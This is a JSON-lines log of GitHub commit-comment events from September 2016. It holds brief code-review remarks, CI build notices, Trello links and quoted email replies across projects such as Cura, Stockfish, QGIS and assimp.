{"id":"4547793744","type":"CommitCommentEvent","actor":{"login":"kimkulling"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18980906,"position":null,"line":null,"path":null,"commit_id":"22cfe84cba10caebea61078c16fbb564af9e39dc","created_at":"2016-09-12T07:44:10Z","updated_at":"2016-09-12T07:44:10Z","body":"Qt5 widget API is stable as well. And of course it makes more sence to use\nthe latest major-release when introducing a new tool. Unfortunately I\npushed this change already to master. I will fix that back to Qt4 and do my\nwork for Qt5-prot on a separate branch.\n\nsmalcom <notifications@github.com> schrieb am Sa., 10. Sep. 2016 um\n09:52 Uhr:\n\n> A c W\n>\n> What? )))\n>\n> I propose to use both version. I mean: which version found it will be used.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/assimp/assimp/commit/22cfe84cba10caebea61078c16fbb564af9e39dc#commitcomment-18972963>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACNy1EmMz9Uwc6NGKslhhFDh3-7Kbpgfks5qomHAgaJpZM4J5qWe>\n> .\n>\n"}},"created_at":"2016-09-12T07:44:10Z"}
{"id":"4547795160","type":"CommitCommentEvent","actor":{"login":"mahuichao"},"repo":{"name":"mahuichao/ScalaWorkSpace"},"payload":{"comment":{"id":18980910,"position":null,"line":null,"path":null,"commit_id":"c05e79282a4267ad42f58cfc0f4cdd5551953999","created_at":"2016-09-12T07:44:33Z","updated_at":"2016-09-12T07:44:33Z","body":"spark-sql 解析redis数据创建表格查询相应字段导入redis"}},"created_at":"2016-09-12T07:44:33Z"}
{"id":"4547797099","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"bumptech/glide"},"payload":{"comment":{"id":18980918,"position":null,"line":null,"path":null,"commit_id":"b54084a99d80b979db075fcc4f8edd7bff459381","created_at":"2016-09-12T07:45:04Z","updated_at":"2016-09-12T07:45:04Z","body":"#1464?"}},"created_at":"2016-09-12T07:45:04Z"}
{"id":"4547799275","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"bumptech/glide"},"payload":{"comment":{"id":18980927,"position":11,"line":24,"path":"third_party/gif_decoder/build.gradle","commit_id":"b54084a99d80b979db075fcc4f8edd7bff459381","created_at":"2016-09-12T07:45:40Z","updated_at":"2016-09-12T07:45:40Z","body":"#1464?"}},"created_at":"2016-09-12T07:45:40Z"}
{"id":"4547801776","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18980933,"position":6,"line":633,"path":"resources/definitions/fdmprinter.def.json","commit_id":"791042dcb8b5c6917c4a56ab239455d5e640ecd0","created_at":"2016-09-12T07:46:22Z","updated_at":"2016-09-12T07:46:22Z","body":"Uh. Shouldn't this be defined by the adhesion extruder? "}},"created_at":"2016-09-12T07:46:22Z"}
{"id":"4547805098","type":"CommitCommentEvent","actor":{"login":"JiaLin-Leung"},"repo":{"name":"django/django"},"payload":{"comment":{"id":18980937,"position":null,"line":null,"path":null,"commit_id":"0368d63a78b07e794138a65216b91eadbb47fc2f","created_at":"2016-09-12T07:47:18Z","updated_at":"2016-09-12T07:47:18Z","body":"very nice"}},"created_at":"2016-09-12T07:47:18Z"}
{"id":"4547814593","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":18980955,"position":13,"line":124,"path":"CHANGES.txt","commit_id":"08d7677a4721a4329e35319434364141f9ab5b0f","created_at":"2016-09-12T07:50:00Z","updated_at":"2016-09-12T07:50:00Z","body":"@taschini  methodify_auto should be methodify"}},"created_at":"2016-09-12T07:50:00Z"}
{"id":"4547814919","type":"CommitCommentEvent","actor":{"login":"a14462539"},"repo":{"name":"a14462539/-a14462539.github.io"},"payload":{"comment":{"id":18980957,"position":null,"line":null,"path":null,"commit_id":"648622ec62ff2dbe391c03c799cedf4f145c6c15","created_at":"2016-09-12T07:50:07Z","updated_at":"2016-09-12T07:50:07Z","body":"222"}},"created_at":"2016-09-12T07:50:07Z"}
{"id":"4547816790","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18980960,"position":6,"line":633,"path":"resources/definitions/fdmprinter.def.json","commit_id":"791042dcb8b5c6917c4a56ab239455d5e640ecd0","created_at":"2016-09-12T07:50:37Z","updated_at":"2016-09-12T07:50:37Z","body":"Nope. A skirt is printed for each used nozzle.\n\nOp 12 sep. 2016 09:46 schreef \"Jaime van Kessel\" <notifications@github.com>:\n\n> Uh. Shouldn't this be defined by the adhesion extruder?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ultimaker/Cura/commit/791042dcb8b5c6917c4a56ab239455d5e640ecd0#commitcomment-18980933>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIe9Ef-ScP4uzOD1g4aNXobgkNFwlkh2ks5qpQNQgaJpZM4J6UJZ>\n> .\n>\n"}},"created_at":"2016-09-12T07:50:37Z"}
{"id":"4547816884","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18980961,"position":null,"line":null,"path":null,"commit_id":"7cfc5b4b608c8b5a4694df021b4517974e71b1a4","created_at":"2016-09-12T07:50:39Z","updated_at":"2016-09-12T07:50:39Z","body":"i am not sure, i think that error you had was just really old"}},"created_at":"2016-09-12T07:50:39Z"}
{"id":"4547820427","type":"CommitCommentEvent","actor":{"login":"martinadamek"},"repo":{"name":"inloop/ScreenInfo"},"payload":{"comment":{"id":18980972,"position":45,"line":163,"path":"app/src/main/java/eu/inloop/screeninfo/MainActivity.java","commit_id":"66a5a79b0520c108d0b7733aa4c88bd2c4f38b5c","created_at":"2016-09-12T07:51:39Z","updated_at":"2016-09-12T07:51:39Z","body":"Why 2 empty lines?"}},"created_at":"2016-09-12T07:51:39Z"}
{"id":"4547821467","type":"CommitCommentEvent","actor":{"login":"gitslagga"},"repo":{"name":"gitslagga/yiyuan"},"payload":{"comment":{"id":18980977,"position":18,"line":3,"path":"README.md","commit_id":"c1fb1cf43a82439d222997b9dc1c4ebf907ac17f","created_at":"2016-09-12T07:51:56Z","updated_at":"2016-09-12T07:51:56Z","body":"I'm a git worker too."}},"created_at":"2016-09-12T07:51:56Z"}
{"id":"4547825857","type":"CommitCommentEvent","actor":{"login":"martinadamek"},"repo":{"name":"inloop/ScreenInfo"},"payload":{"comment":{"id":18980995,"position":15,"line":26,"path":"app/src/main/res/layout/info_layout.xml","commit_id":"66a5a79b0520c108d0b7733aa4c88bd2c4f38b5c","created_at":"2016-09-12T07:53:10Z","updated_at":"2016-09-12T07:53:10Z","body":"???"}},"created_at":"2016-09-12T07:53:10Z"}
{"id":"4547830670","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18981004,"position":30,"line":25,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"852a7d20bc5f0adf17f9c3da32c79474411304ac","created_at":"2016-09-12T07:54:27Z","updated_at":"2016-09-12T07:54:27Z","body":"We didn't wrap our own, no. We've always just used `ConfigParser` directly to represent a file, without wrapping it around something. `ConfigParser` is not very Pythonic, but it does the job for what we need from it."}},"created_at":"2016-09-12T07:54:27Z"}
{"id":"4547831578","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18981011,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T07:54:42Z","updated_at":"2016-09-12T07:54:42Z","body":"This kind of test is quite new and still not so documented, I will updte\nteh corresponding wiki entry.\n\nIf for you is a problem to resubmit, I can do it for you considering this\ndetail was not clarified in advance.\n\n\nOn Monday, September 12, 2016, syzygy1 <notifications@github.com> wrote:\n\n> Well, I don't think either of the two equivalent options is easier to\n> understand than the other and I certainly did not pick this one \"just\n> because I know that it is equivalent and do not take in consideration that\n> the most part of us simply will not understand\". Note that I took care to\n> include an explanation in the note. I simply had to pick one and apparently\n> I picked the wrong one (even though people now might think that master is\n> being tested). If the testing guidelines page makes clear which one of the\n> two possibilities to take in this precise situation, then I overlooked it\n> and I apologise for that.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/syzygy1/Stockfish/commit/c95b70b855888b9fed745f5d3b657b0b2eb1426b#commitcomment-18980789>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAUhp9nL_smTTw3Y6R99rDkF0MC0cks5qpP_cgaJpZM4J6N6J>\n> .\n>\n"}},"created_at":"2016-09-12T07:54:42Z"}
{"id":"4547834898","type":"CommitCommentEvent","actor":{"login":"WhiteNull"},"repo":{"name":"WhiteNull/Hello-World"},"payload":{"comment":{"id":18981026,"position":null,"line":null,"path":null,"commit_id":"6e9d7e06f07665c49e5123ded59bb9ac3948b903","created_at":"2016-09-12T07:55:34Z","updated_at":"2016-09-12T07:55:34Z","body":"111"}},"created_at":"2016-09-12T07:55:34Z"}
{"id":"4547835302","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981027,"position":null,"line":null,"path":null,"commit_id":"f83ad8c2f5a1a12534bcc5da8cbfa1a44dd29a1c","created_at":"2016-09-12T07:55:40Z","updated_at":"2016-09-12T07:55:40Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 233](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1189&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:25:20"}},"created_at":"2016-09-12T07:55:40Z"}
{"id":"4547835327","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981028,"position":null,"line":null,"path":null,"commit_id":"d5900f58254e2458815631bca9ca5f06323c81d9","created_at":"2016-09-12T07:55:41Z","updated_at":"2016-09-12T07:55:41Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 234](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1190&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T07:55:41Z"}
{"id":"4547838740","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18981038,"position":null,"line":null,"path":null,"commit_id":"b2b1d620c6b1f56549b1b26b78f8a1ef8feeb9b5","created_at":"2016-09-12T07:56:36Z","updated_at":"2016-09-12T07:56:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;H8JV1GBp&#x2F;11-permettre-de-modifier-le-selecteur-de-la-valeur-unique-d-un-document\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Permettre de modifier le sélecteur de la valeur unique d&#39;un document</a>"}},"created_at":"2016-09-12T07:56:36Z"}
{"id":"4547838967","type":"CommitCommentEvent","actor":{"login":"lp--"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18981039,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T07:56:39Z","updated_at":"2016-09-12T07:56:39Z","body":"@mcostalba : I am sorry , I did not mean to knit-pick or like that. What I  meant is that Ronald is submitting test for the first time, so it would be nice to go easy on him, as test submission was correct, and I have seen this test hanging probably 10 hours ago."}},"created_at":"2016-09-12T07:56:39Z"}
{"id":"4547843304","type":"CommitCommentEvent","actor":{"login":"maksyms"},"repo":{"name":"maksyms/PuTTYTray"},"payload":{"comment":{"id":18981055,"position":null,"line":null,"path":null,"commit_id":"2fee2380e90c11ebadaf701bbc55b95626afebff","created_at":"2016-09-12T07:57:47Z","updated_at":"2016-09-12T07:57:47Z","body":"Thanks for pulling it into PuTTYTray! It'd be great to let me know ([my site with the change](https://schipka.com/archives/34)) that it was done, as I definitely could have used other fantastic features of PuTTYTray a lot earlier! But regardless, great to see it useful!"}},"created_at":"2016-09-12T07:57:47Z"}
{"id":"4547844116","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18981058,"position":null,"line":null,"path":null,"commit_id":"ea4ee34ba0e86d8e2733defee14df6fa8487b612","created_at":"2016-09-12T07:58:02Z","updated_at":"2016-09-12T07:58:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KMJ9I4oW&#x2F;47-basic-style\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Basic Style</a>"}},"created_at":"2016-09-12T07:58:02Z"}
{"id":"4547844132","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18981059,"position":null,"line":null,"path":null,"commit_id":"ea4ee34ba0e86d8e2733defee14df6fa8487b612","created_at":"2016-09-12T07:58:02Z","updated_at":"2016-09-12T07:58:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KMJ9I4oW&#x2F;47-basic-style\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Basic Style</a>"}},"created_at":"2016-09-12T07:58:02Z"}
{"id":"4547848520","type":"CommitCommentEvent","actor":{"login":"anomalocation"},"repo":{"name":"anomalocation/AnnotarionTXTtoCSV"},"payload":{"comment":{"id":18981073,"position":null,"line":null,"path":null,"commit_id":"860f4caef7da34f89d14f9b18301fa8ad300f48c","created_at":"2016-09-12T07:59:12Z","updated_at":"2016-09-12T07:59:12Z","body":"gitignore"}},"created_at":"2016-09-12T07:59:12Z"}
{"id":"4547850760","type":"CommitCommentEvent","actor":{"login":"ChristianPeters"},"repo":{"name":"juliesol/hello-world"},"payload":{"comment":{"id":18981081,"position":null,"line":null,"path":null,"commit_id":"8fd34214df87a1abc1b964480bb9d6873bb944c2","created_at":"2016-09-12T07:59:47Z","updated_at":"2016-09-12T07:59:47Z","body":"Congratz! 🎉  😀 "}},"created_at":"2016-09-12T07:59:47Z"}
{"id":"4547852307","type":"CommitCommentEvent","actor":{"login":"Lucas-Geitner"},"repo":{"name":"Lucas-Geitner/twitter_fan_zone"},"payload":{"comment":{"id":18981087,"position":null,"line":null,"path":null,"commit_id":"99955aeef6f1570279ca8ad6c06aca0697abe148","created_at":"2016-09-12T08:00:12Z","updated_at":"2016-09-12T08:00:12Z","body":"So Nice :) "}},"created_at":"2016-09-12T08:00:12Z"}
{"id":"4547853108","type":"CommitCommentEvent","actor":{"login":"jaaaco"},"repo":{"name":"jaaaco/inspinia-table"},"payload":{"comment":{"id":18981090,"position":25,"line":123,"path":"lib/Table.js","commit_id":"1b566f208cec37c78aa6c327ef9ccf7bc050c2f0","created_at":"2016-09-12T08:00:21Z","updated_at":"2016-09-12T08:00:21Z","body":"to nie jest potrzebne, bo wyżej masz ustawienie this.page = 1"}},"created_at":"2016-09-12T08:00:21Z"}
{"id":"4547856425","type":"CommitCommentEvent","actor":{"login":"maksyms"},"repo":{"name":"FauxFaux/PuTTYTray"},"payload":{"comment":{"id":18981096,"position":null,"line":null,"path":null,"commit_id":"2fee2380e90c11ebadaf701bbc55b95626afebff","created_at":"2016-09-12T08:01:12Z","updated_at":"2016-09-12T08:01:12Z","body":"Thanks for pulling it into PuTTYTray! It'd be great to let me know [(my site with the change)](https://schipka.com/archives/34) that it was done, as I definitely could have used other fantastic features of PuTTYTray a lot earlier! But regardless, great to see it useful!\r\n\r\nIs there anywhere where you do the necessary registry changes to get putty to use these protocols?"}},"created_at":"2016-09-12T08:01:12Z"}
{"id":"4547862264","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18981107,"position":null,"line":null,"path":null,"commit_id":"6b8130d54d17ca9b6e4e047b6f8da15c3d88a8da","created_at":"2016-09-12T08:02:45Z","updated_at":"2016-09-12T08:02:45Z","body":"I'd go one step further and remove the unused svgs too"}},"created_at":"2016-09-12T08:02:45Z"}
{"id":"4547862679","type":"CommitCommentEvent","actor":{"login":"taschini"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":18981109,"position":13,"line":124,"path":"CHANGES.txt","commit_id":"08d7677a4721a4329e35319434364141f9ab5b0f","created_at":"2016-09-12T08:02:51Z","updated_at":"2016-09-12T08:02:51Z","body":"Thanks. I'll fix that."}},"created_at":"2016-09-12T08:02:51Z"}
{"id":"4547863881","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18981112,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T08:03:06Z","updated_at":"2016-09-12T08:03:06Z","body":"@lp-- this kind of test is quite new, I will document it in teh wiki. It stalled 10 hours because approves (like @tomtor) did not understand the flipping in SPRT parameters, nor I btw.....and I was sleeping in the meantime :-)\r\n"}},"created_at":"2016-09-12T08:03:06Z"}
{"id":"4547864138","type":"CommitCommentEvent","actor":{"login":"Hee-San"},"repo":{"name":"Hee-San/unity-clicker"},"payload":{"comment":{"id":18981113,"position":null,"line":null,"path":null,"commit_id":"0873125089292f0779c07c0ecbb9bd4a1188fe97","created_at":"2016-09-12T08:03:11Z","updated_at":"2016-09-12T08:03:11Z","body":"仕様です。"}},"created_at":"2016-09-12T08:03:11Z"}
{"id":"4547868151","type":"CommitCommentEvent","actor":{"login":"SirFrancisBillard"},"repo":{"name":"SirFrancisBillard/lua-projects"},"payload":{"comment":{"id":18981119,"position":null,"line":null,"path":null,"commit_id":"cb9ddc70d0dc017b35cb36c5464ecfbd0150c729","created_at":"2016-09-12T08:04:15Z","updated_at":"2016-09-12T08:04:15Z","body":"I was demonstrating how to create a backdoor to Nathaniel, sorry about that."}},"created_at":"2016-09-12T08:04:15Z"}
{"id":"4547872669","type":"CommitCommentEvent","actor":{"login":"2016JTM2081"},"repo":{"name":"elp718/assign7"},"payload":{"comment":{"id":18981131,"position":null,"line":null,"path":null,"commit_id":"860516532af8939e99c0949e9418e67580d67ea8","created_at":"2016-09-12T08:05:27Z","updated_at":"2016-09-12T08:05:27Z","body":"updated"}},"created_at":"2016-09-12T08:05:27Z"}
{"id":"4547876776","type":"CommitCommentEvent","actor":{"login":"Thomas301263"},"repo":{"name":"ManuGithubSteam/LinJarK"},"payload":{"comment":{"id":18981144,"position":null,"line":null,"path":null,"commit_id":"21f9244272aec08aafc7612d7e04efb415f9637c","created_at":"2016-09-12T08:06:33Z","updated_at":"2016-09-12T08:06:33Z","body":"Hallo Manuel,\n\nhast Du denn nur Text trainiert, der für Deine Sprachsteuerung wichtig \nwar, oder hast Du einfach nur sehr viel Text genommen\nund Simon soz. vorgelesen, damit möglichst viele Worte im Vocabular von \nSimon sind.\nIch arbeite im Moment auch wieder vermehrt an meiner Hausautomatisation \nund habe es sehr weit gebracht.\nIch komme jetzt bei meinen 120 m² Wohnfläche mit etwa 500.- € p.a. \nBrennmaterial aus. Weiter komme ich einfach nicht runter,\naber irgendwo ist eine Grenze.\nAls nächstes geht es daran meinen Strom zum größten Teil selbst zu \nproduzieren, denn ich will mir den Tesla Modell 3 zulegen.\nBin auf dem Trip in meinen Augen alles zu tun um meinen \nSchadstoffausstoss so weit wie möglich zu reduzieren.\nWas mich für den Elektroantrieb gestimmt hat war eine neue Entwicklung \nvon Akkus, die bei gleicher Größe die doppelte\nKapazität haben sollen.\n\n\nThomas\n\n\n\n\n\nAm 11.09.2016 um 16:36 schrieb Manuel:\n> Hallo Thomas,\n>\n> Leider ruht mein Linjark Projekt gerade. Da es kein neues Sprachmodell\n> gibt und ich leider sehr wenig Zeit habe fehlt mir die Motivation.\n> Inzwischen läuft auf dem Raspi ein Octoprint server für meinen 3D\n> Drucker :-)\n>\n> Mein letzter Stand war, das Simon an einen anderen Entwickler unergeben\n> wurde, dieser wollte es schlanker machen und so ähnlich wie Cortana.\n> Nach anfängliche euphorie scheint es aber eingeschalfen zu sein.\n> Zumindest hat er sich nicht mehr bei mir gemeldet....\n>\n> Das mit den Hintergrundgeräuschen kannst du auf zwei arten lösen:\n>\n> 1. (sauber) viel mehr traininssamples (ich habe 2.5 gig und es geht\n> einigermaßen)\n>\n> 2. (sehr dirty) du trainierst das rauschen und hinterlegst aber keinen\n> befehl. so wird das zwar erkannt aber es tut dann nix. Geht halt nur\n> wenn die störgeräusche annähernd die selben sind.\n>\n> Ich hatte zeitweise eine Mischung von 1 und 2 am laufen und es ging\n> recht gut. Habe mich dann aber für Lösung 1 entschieden.\n>\n> Freut mich sehr das d soweit gekommen bist!\n>\n> Manuel\n>\n> On 09/11/2016 12:54 PM, Thomas301263 wrote:\n> > Hallo Manuel,\n> >\n> > wollte mal nachfragen wie weit Du mit Deinem Raspi gekommen bist.\n> >\n> > Bei mir geht alles mit Raspi 2 + 3, Ubuntu Mate 16.04 und PHP 7. Jetzt\n> > kann ich alles was ich will steuern, nur die\n> >\n> > Sprachauswertung von Simon könnte verbessert werden. Es passieren immer\n> > noch Aktionen die durch Hintergrundgeräusche\n> >\n> > entstehen.\n> >\n> > Gibt es denn zu Simon denn schon neue Erkenntnisse?\n> >\n> >\n> > Gruß\n> >\n> > Thomas\n> >\n> >\n> >\n> > Am 05.03.2016 um 13:24 schrieb Manuel:\n> > > Hallo Thomas,\n> > >\n> > > Also um das zusammen zu fassen:\n> > > Raspi 2 - langsamer aber ok\n> > > Raspi 3 schnell aber abstürze von Simon ?\n> > >\n> > > Ja das mit den Hintergrundgeräuschen ist ein Problem. Da gibt es nicht\n> > > viele Lösungen außer du trainierst auch mit Hintergrundgeräuschen, \n> dann\n> > > fällt das nicht mehr so auf. Bei mir zb mein Rechnersummen, das wird\n> > dann\n> > > einfach als gegeben angesehen. Aber mit Variablem\n> > > Hintergrundgeräuschen ist\n> > > es da schon schwieriger...\n> > >\n> > > Es gibt ein Modul für Pulseaudio das die Soundausgane vom PC \n> theoretisch\n> > > rausrechnet wenn man die wieder aufnimmt. Habe ich aber nicht so\n> > ganz zum\n> > > laufen bekommen denke bei mir lag das an der Leitungsverzerrung. Für\n> > > andere\n> > > Hintergrundgeräusche gibt es leider keine Lösung aber google usw\n> > > dürften da\n> > > auch Probleme haben.\n> > >\n> > > as Simon technisch geht, das du den Noise Level hoch setzt, \n> dadurch wird\n> > > einfach mehr Rausgefiltert was unter einer Bestimmten Lautstärke\n> > ist, dann\n> > > musst du aber auch immer Lauter sprechen als der Level. Muss man\n> > eben gut\n> > > kalibrieren...\n> > >\n> > > Soweit von mir\n> > >\n> > > Manuel\n> > >\n> > > 2016-03-05 12:19 GMT+01:00 Thomas301263 <notifications@github.com>:\n> > >\n> > > > News\n> > > > Also Raspi 2 mit Ubuntu Mate 15.10.3 funktioniert zusammen mit \n> Simon.\n> > > > Allerdings solltest Du bevor Du Simon installierst\n> > sphinxbase-utils und\n> > > > libqt4-sql-sqlite installieren.\n> > > > Danach alles wie gehabt. Raspi 2 ist zwar etwas langsam, aber er\n> > > > funktioniert mit Simon.\n> > > > Habe mir auch gleich nach Bekanntgabe das es Raspi 3 gibt einen\n> > > geordert.\n> > > > Der ist etwas schneller\n> > > > und damit funktioniert Simon gut und akzeptabel schnell. Auch das\n> > > > compilieren dauert nicht so lange.\n> > > > Das einzige Manko was Simon mit dem Raspi hat, ist das der Raspi \n> nach\n> > > > Spracheingaben ab und an neu gestartet werden muss. Irgendwie \n> kommt er\n> > > > irgendwo noch durcheinander.\n> > > > Mich versteht er schon gut und er macht auch alles so wie ich es\n> > > will, nur\n> > > > wenn es Hintergrunggeräusche gibt, dann kommt ab und zu was dabei\n> > > raus was\n> > > > man nicht möchte.\n> > > > Fällt Dir dazu etwas ein oder wie hast Du es gelöst, dass er nur auf\n> > > > Befehle hört?\n> > > > Gruß\n> > > > Thomas\n> > > >\n> > > > —\n> > > > Reply to this email directly or view it on GitHub\n> > > >\n> > >\n> > \n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-16517377>\n> > > > .\n> > > >\n> > >\n> > > —\n> > > Reply to this email directly or view it on GitHub\n> > >\n> > \n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-16517620>.\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > \n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-18976749>,\n> > or mute the thread\n> > \n> <https://github.com/notifications/unsubscribe-auth/ADS_4qxrnmW_ADtosO8-D91NpLe3Hd-eks5qo932gaJpZM4HZ6Dl>.\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-18977144>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/APEK1MVEThhNluFbCnnR0kGwnebtC821ks5qpBH6gaJpZM4HZ6Dl>.\n>\n\n"}},"created_at":"2016-09-12T08:06:33Z"}
{"id":"4547885200","type":"CommitCommentEvent","actor":{"login":"sethvargo"},"repo":{"name":"hashicorp/vault-rails"},"payload":{"comment":{"id":18981158,"position":6,"line":65,"path":"lib/vault/rails.rb","commit_id":"07399786d9fc09c295e93af0df87023eaf26c827","created_at":"2016-09-12T08:08:47Z","updated_at":"2016-09-12T08:08:47Z","body":"You can't do that in Vault (try it) - Go considers the empty string to be nil"}},"created_at":"2016-09-12T08:08:47Z"}
{"id":"4547887358","type":"CommitCommentEvent","actor":{"login":"mnzt"},"repo":{"name":"mnzt/diet-jade"},"payload":{"comment":{"id":18981161,"position":20,"line":20,"path":"index.js","commit_id":"d6231062aa6eeb37f9b96ac87a2415368fa948d3","created_at":"2016-09-12T08:09:20Z","updated_at":"2016-09-12T08:09:20Z","body":"Sorry about this, I'll remove."}},"created_at":"2016-09-12T08:09:20Z"}
{"id":"4547899176","type":"CommitCommentEvent","actor":{"login":"inwon5554"},"repo":{"name":"inwon5554/vote"},"payload":{"comment":{"id":18981179,"position":null,"line":null,"path":null,"commit_id":"2e5b6106cd62eaacd2afd890a4cead764ac44b56","created_at":"2016-09-12T08:12:25Z","updated_at":"2016-09-12T08:12:25Z","body":"gitignore"}},"created_at":"2016-09-12T08:12:25Z"}
{"id":"4547900449","type":"CommitCommentEvent","actor":{"login":"Tofee"},"repo":{"name":"nizovn/meta-webos-ports"},"payload":{"comment":{"id":18981181,"position":4,"line":52,"path":"meta-luneos/recipes-webos/nyx-modules/nyx-modules.bb","commit_id":"c46f7321157399a5882695804d802a53677a1a6e","created_at":"2016-09-12T08:12:43Z","updated_at":"2016-09-12T08:12:43Z","body":"I think we have a standard way for systemd files for recipes, something like \"inherit systemd\""}},"created_at":"2016-09-12T08:12:43Z"}
{"id":"4547900815","type":"CommitCommentEvent","actor":{"login":"gitslagga"},"repo":{"name":"gitslagga/test"},"payload":{"comment":{"id":18981182,"position":null,"line":null,"path":null,"commit_id":"6ef87a5f00d73332f8783a4fa62f93283080519d","created_at":"2016-09-12T08:12:49Z","updated_at":"2016-09-12T08:12:49Z","body":"It is good!"}},"created_at":"2016-09-12T08:12:49Z"}
{"id":"4547900951","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18981183,"position":null,"line":null,"path":null,"commit_id":"6b8130d54d17ca9b6e4e047b6f8da15c3d88a8da","created_at":"2016-09-12T08:12:51Z","updated_at":"2016-09-12T08:12:51Z","body":"I'd leave that to whoever does the SVGs for the remaining PNGs ;)"}},"created_at":"2016-09-12T08:12:51Z"}
{"id":"4547901557","type":"CommitCommentEvent","actor":{"login":"gitslagga"},"repo":{"name":"gitslagga/test"},"payload":{"comment":{"id":18981185,"position":null,"line":null,"path":null,"commit_id":"6ef87a5f00d73332f8783a4fa62f93283080519d","created_at":"2016-09-12T08:13:01Z","updated_at":"2016-09-12T08:13:01Z","body":"It is goods."}},"created_at":"2016-09-12T08:13:01Z"}
{"id":"4547903393","type":"CommitCommentEvent","actor":{"login":"sjamaan"},"repo":{"name":"wehu/prcc"},"payload":{"comment":{"id":18981187,"position":null,"line":null,"path":null,"commit_id":"dcc7ad2e7dffd248bac346256dfae4b68951b283","created_at":"2016-09-12T08:13:30Z","updated_at":"2016-09-12T08:13:30Z","body":"Please don't remove old releases. You can add multiple `(release ...)` lines, one per release.\r\n\r\nIf people (for whatever reason) need a specific older version of your egg, they should be able to get it.\r\n\r\nYou can use a placeholder to let it find the right release, like so:\r\n\r\n```\r\n(uri targz \"https://github.com/wehu/{egg-name}/archive/v{egg-release}.tar.gz\")\r\n```\r\n\r\nThough most people use the \"tarball\" feature of github which serves a tarball based on a tag, to avoid having to upload a specific release.  That works like so:\r\n\r\n```\r\n(uri targz \"https://github.com/wehu/{egg-name}/tarball/v{egg-release}\")\r\n```"}},"created_at":"2016-09-12T08:13:30Z"}
